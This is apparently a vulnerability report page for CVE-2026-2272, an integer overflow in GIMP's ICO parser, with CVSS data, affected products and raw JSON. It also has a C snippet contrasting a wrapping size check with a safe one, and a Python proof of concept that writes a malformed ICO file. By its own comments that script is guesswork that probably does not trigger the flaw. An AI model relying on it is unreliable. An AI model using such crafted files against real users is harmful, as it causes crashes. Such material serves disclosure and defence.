Security Vulnerability Report
CVE-2026-2272 CVSS 4.3 MEDIUM

CVE-2026-2272

Published: 2026-03-26 21:17:05
Last Modified: 2026-04-03 20:17:54

Description

A flaw was found in GIMP. An integer overflow vulnerability exists when processing ICO image files, specifically in the `ico_read_info` and `ico_read_icon` functions. This issue arises because a size calculation for image buffers can wrap around due to a 32-bit integer evaluation, allowing oversized image headers to bypass security checks. A remote attacker could exploit this by providing a specially crafted ICO file, leading to a buffer overflow and memory corruption, which may result in an application level denial of service.
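The wrap-around described above, next to an overflow-safe check, as an added example (not GIMP's code and not taken from the referenced advisories). It assumes 32-bit width, height and bytes-per-pixel values read from an image header; the function names and the `MAX_BUF_BYTES` limit are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical cap on a decoded image buffer for this example (256 MiB). */
#define MAX_BUF_BYTES ((uint64_t)256 * 1024 * 1024)

/* Flawed pattern: the product is evaluated in 32 bits, so it wraps
 * modulo 2^32 before the limit check ever sees the real size. */
static bool size_check_wrapping(uint32_t width, uint32_t height,
                                uint32_t bytes_per_pixel, uint32_t *out)
{
    uint32_t size = width * height * bytes_per_pixel; /* may wrap */
    if (size > MAX_BUF_BYTES)
        return false;
    *out = size;
    return true;
}

/* Hardened pattern: reject zero fields, then bound each factor by
 * division so no intermediate product can exceed the limit or wrap. */
static bool size_check_safe(uint32_t width, uint32_t height,
                            uint32_t bytes_per_pixel, size_t *out)
{
    if (width == 0 || height == 0 || bytes_per_pixel == 0)
        return false;
    if (width > MAX_BUF_BYTES / bytes_per_pixel)
        return false;
    uint64_t row = (uint64_t)width * bytes_per_pixel;
    if (height > MAX_BUF_BYTES / row)
        return false;
    *out = (size_t)(row * height);
    return true;
}

int main(void)
{
    uint32_t wrapped = 0;
    size_t safe = 0;
    /* Constructed header values: true size is 4295098368 bytes. */
    bool a = size_check_wrapping(32769u, 32768u, 4u, &wrapped);
    bool b = size_check_safe(32769u, 32768u, 4u, &safe);
    printf("wrapping check: accepted=%d size=%u\n", a, (unsigned)wrapped);
    printf("safe check:     accepted=%d\n", b);
    return 0;
}
```

With the constructed values, the 32-bit product wraps to a small number that passes the limit check, while the division-based check rejects the header before any buffer is sized from it.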

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.0.6:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
GIMP (refer to the official advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# PoC to generate a malformed ICO file that may trigger the integer overflow.
# This is a conceptual example based on the vulnerability description.


def create_malformed_ico(filename):
    # ICO Header: 2 bytes Reserved (0), 2 bytes Type (1 for icon), 2 bytes Count (1)
    ico_header = struct.pack('<HHH', 0, 1, 1)

    # Directory Entry (16 bytes): 1 byte Width, 1 byte Height, 1 byte Colors,
    # 1 byte Reserved, 2 byte Planes (1), 2 byte BitCount (32 for RGBA),
    # 4 byte SizeInBytes, 4 byte ImageOffset (22 bytes = 6 + 16)

    # Setting Width/Height to 0 or 256 (common for large icons) but here we might
    # try to manipulate the size calculation logic if it were specific.
    # The vulnerability mentions oversized headers bypassing checks.
    width = 0  # Represents 256 in some contexts, or triggers specific parsing
    height = 0
    colors = 0
    planes = 1
    bit_count = 32

    # Let's set a large size that might cause the multiplication overflow in 32-bit
    # e.g., width * height * 4 bytes > 2^32
    # Assuming the parser treats 0 as 256, 256*256*4 = 262144 (safe).
    # We need a value that overflows. Let's say the logic uses (w+1) or similar.
    # Without the exact source code logic of the vulnerable version, we provide a
    # structure that attempts to pass a large size claim.
    size_in_bytes = 0xFFFFFFFF  # Claim huge size
    image_offset = 22

    # '<BBBBHHII' matches the 16-byte directory entry layout described above
    directory_entry = struct.pack('<BBBBHHII', width, height, colors, 0,
                                  planes, bit_count, size_in_bytes, image_offset)

    with open(filename, 'wb') as f:
        f.write(ico_header + directory_entry)
        # Write minimal dummy data to satisfy the file structure
        f.write(b'\x00' * 100)


create_malformed_ico('malicious.ico')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2272", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:04.907", "lastModified": "2026-04-03T20:17:54.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GIMP. An integer overflow vulnerability exists when processing ICO image files, specifically in the `ico_read_info` and `ico_read_icon` functions. This issue arises because a size calculation for image buffers can wrap around due to a 32-bit integer evaluation, allowing oversized image headers to bypass security checks. A remote attacker could exploit this by providing a specially crafted ICO file, leading to a buffer overflow and memory corruption, which may result in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en GIMP. Existe una vulnerabilidad de desbordamiento de entero al procesar archivos de imagen ICO, específicamente en las funciones `ico_read_info` e `ico_read_icon`. Este problema surge porque un cálculo de tamaño para los búferes de imagen puede dar la vuelta debido a una evaluación de entero de 32 bits, permitiendo que los encabezados de imagen sobredimensionados eludan las comprobaciones de seguridad. 
Un atacante remoto podría explotar esto proporcionando un archivo ICO especialmente diseñado, lo que lleva a un desbordamiento de búfer y corrupción de memoria, lo que puede resultar en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "F9B29A73-05E5-438E-B994-61FBB133B6AC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-2272", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438428", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/15617", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438428", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/15617", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}